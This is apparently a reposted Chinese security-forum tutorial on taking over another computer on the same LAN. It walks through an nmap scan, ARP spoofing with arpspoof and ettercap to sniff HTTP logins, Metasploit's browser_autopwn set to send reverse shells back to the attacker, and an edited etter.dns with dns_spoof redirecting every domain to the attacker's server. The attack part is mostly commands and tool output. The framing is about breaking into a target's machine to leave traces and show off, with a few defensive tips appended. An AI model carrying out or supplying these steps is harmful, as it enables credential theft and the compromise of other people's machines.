来源：http://bbs.ichunqiu.com/thread-9156-1-1.html?from=ch

00x01

如果在同局域网下你想尝试攻破对方机器但是他并没有开放你可利用的端口进行攻击

但是你惊讶的发现，你在Http劫持的时候看到一个可疑的邮箱与密码，这样你便拿下了他的账户

但是你想深入到他的计算机中留下你想要的痕迹来显示你惊人的技术

But，你没有任何方式，只能眼睁睁的看着他逃脱你得魔爪，可是你甘心么？

00x02

攻击器前的准备

1#Kali系统一台

2#被攻击者邮箱

#####################################

#####################################

00X03

攻击前信息搜集

1#被攻击者ip:192.168.1.106-

2#被攻击者网关：192.168.1.1

00x04

既然我们已经得到他的ip，那么我们先扫一下他的端口

命令：

nmap -A 192.168.1.106

复制代码

反馈信息:

135/tcp   open  msrpc

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

49152/tcp open  unknown

49154/tcp open  unknown

49155/tcp open  unknown

49158/tcp open  unknown

复制代码

可以看见，开放端口并不多，135,139,445端口虽然是开放的，但是已经打了补丁，无法直接攻击反弹得到shell

我们先劫持他的Http，看看有什么可利用的信息。

1# 进行流量转发，让目标流量经过本机

命令：

echo 1 >> /proc/sys/net/ipv4/ip_forward[/font]

复制代码

注释：把1写入ip_forward文件中

命令：

cat /proc/sys/net/ipv4/ip_forward

复制代码

注释：检查是否已经写入

可以看见，1已经写入ip_forward中了，我们利用Arpspoof这款工具开始进行Arp欺骗

命令：arpspoof -t 192.168.1.106 192.168.1.1

复制代码

如上图便是欺骗成功了，So~ 那么我们先开始劫持他的Http密文

命令:

ettercap -Tq -i eth0

复制代码

开始劫持~~  因为不是真实攻击，所以我来伪造一个登录的数据流发过去。

成功截取到，如

User=账户

Pass=密码

当然，Http跟Https劫持的方式是不同的。

现在还远远不够，我们还是没有突破口，感觉好头大，与是一个奇颖怪招出来了，攻击他的浏览器，从而突破拿到权限

我们先打开metasploit

命令:

msfconsole

复制代码

当然，再此之前我们需要启动他所需要的服务

命令:

service postgresql start

复制代码

启动成功，我们接着加载他的Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。

命令：

use server/browser_autopwn

复制代码

查看所需要的设置

命令:

show options

复制代码

他会显示以下东西

Module options (auxiliary/server/browser_autopwn):

Name     Current Setting  Required  Description

----     ---------------  --------  -----------

LHOST                     yes       The IP address to use for reverse-connect payloads

SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT  8080             yes       The local port to listen on

SSL      false            no        Negotiate SSL for incoming connections

SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

URIPATH                   no        The URI to use for this exploit (default is random)

复制代码

我们开始设置：

命令：

set uripath /

复制代码

命令：

set LHOST （你的IP地址）

复制代码

命令：

run

复制代码

稍等 一下，他会出现以下东西

出现这个就算是成功了，为了能让目标主机能访问到这个ip地址，我们就必须先DNS劫持跳转

我们先修改kali下的index.html

命令：

leafpad /var/www/html/index.html

复制代码

我们写一个html跳转:

hello AnaLyz3r

i am X_Al3r

Ichunqiu

复制代码

OK。保存后我们先开启apache2服务使kali成为一台web服务器

命令：

/etc/init.d/apache2 start

复制代码

提示:

[ ok ] Starting apache2 (via systemctl): apache2.service

复制代码

表示成功

我们继续来配置ettercap文件

命令：

leafpad /etc/ettercap/etter.dns

复制代码

会出现一下东西。

############################################################################

#                                                                          #

#  ettercap -- etter.dns -- host file for dns_spoof plugin                 #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

############################################################################

#                                                                          #

# Sample hosts file for dns_spoof plugin                                   #

#                                                                          #

# the format is (for A query):                                             #

#   www.myhostname.com A 168.11.22.33                                      #

#   *.foo.com          A 168.44.55.66                                      #

#                                                                          #

# ... for a AAAA query (same hostname allowed):                            #

#   www.myhostname.com AAAA 2001:db8::1                                    #

#   *.foo.com          AAAA 2001:db8::2                                    #

#                                                                          #

# or to skip a protocol family (useful with dual-stack):                   #

#   www.hotmail.com   AAAA ::                                             #

#   www.yahoo.com      A    0.0.0.0                                        #

#                                                                          #

# or for PTR query:                                                        #

#   www.bar.com    PTR 10.0.0.10                                           #

#   www.google.com PTR ::1                                                 #

#                                                                          #

# or for MX query (either IPv4 or IPv6):                                   #

#    domain.com MX xxx.xxx.xxx.xxx                                         #

#    domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx                #

#    domain3.com MX xxxx:xxxx::y                                           #

#                                                                          #

# or for WINS query:                                                       #

#    workgroup WINS 127.0.0.1                                              #

#    PC*       WINS 127.0.0.1                                              #

#                                                                          #

# or for SRV query (either IPv4 or IPv6):                                  #

#    service._tcp|_udp.domain SRV 192.168.1.10:port                        #

#    service._tcp|_udp.domain SRV [2001:db8::3]:port                       #

#                                                                          #

# or for TXT query (value must be wrapped in double quotes):               #

#    google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all"                       #

#                                                                          #

# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #

#       so if you want to reverse poison you have to specify a plain       #

#       host. (look at the www.microsoft.com example)                      #

#                                                                          #

############################################################################

################################

# microsoft sucks ;)

# redirect it towww.linux.org

#

microsoft.com      A   107.170.40.56

*.microsoft.com    A   107.170.40.56

www.microsoft.com  PTR 107.170.40.56      # Wildcards in PTR are not allowed

*                  A   192.168.1.106               #复制修改你kali上的ip

*                  PTR 192.168.1.106            #扶着修改你kali上的ip

##########################################

# no one out there can have our domains...

#

www.alor.org  A 127.0.0.1

www.naga.org  A 127.0.0.1

www.naga.org  AAAA 2001:db8::2

##########################################

# dual stack enabled hosts does not make life easy

# force them back to single stack

www.ietf.org   A    127.0.0.1

www.ietf.org   AAAA ::

www.example.org  A    0.0.0.0

www.example.org  AAAA ::1

###############################################

# one day we will have our ettercap.org domain

#

www.ettercap.org           A  127.0.0.1

www.ettercap-project.org   A  127.0.0.1

ettercap.sourceforge.net   A  23.235.43.133

www.ettercap.org           PTR ::1

###############################################

# some MX examples

#

alor.org   MX  127.0.0.1

naga.org   MX  127.0.0.1

example.org MX 127.0.0.2

microsoft.com MX 2001:db8::1ce:c01d:bee3

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

#

LAB-PC*  WINS  127.0.0.1

###############################################

# some service discovery examples

xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269

ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389

###############################################

# little example for TXT records

#

naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"

# vim:ts=8:noexpandtab

复制代码

修改第62行与63行

修改成功后我们启动ettercar

命令：

ettercap -G

复制代码-G为图形化启动

-T为文本模式

我们先Ctrl+u 选择eth0无线网卡选择wlan0

一为扫局域网下存活主机，二为列出存活主机列表

被攻击者ip设置为第二个选项，网关设置为第三个选项

勾上第一个，我们开始进行arp欺骗

我们接下来选择dns_spoof模块

双击进行选择，选择成功后他会有一个*号出现。

开始进行启动。

我们ping一下百度发现ip已经变成我kali上的IP了，那么DNS已经劫持成功

我们写的html也开始发挥作用了

一般人是不会怀疑的直接进行更新，那么在他更新的一瞬间，他就已经中招了他的浏览器已经开始被攻击

在哗啦哗啦一堆下面他会出现一个反弹的shell那么权限也就拿到了

例如是什么系统，等信息已经出来了，耐心等待就会返回一个shell

00x05

总结

1# 有时候无法攻破局域网的主机的时候可以尝试进行浏览器攻击得到权限

2# 不一定只有msf的那个模块才可以进行浏览器攻击例如beff也是可以的

3# Dns的确是个很不错的帮手，他会帮助你少去很多麻烦

防护建议

1#  浏览器补丁要经常打，对于系统漏洞也需要经常打补丁

2#  开启Arp防火墙

3# 发现DNS不对劲立刻纠正过来否则会承受系统沦陷的后果

4# 杀软防火墙等是需要存在的，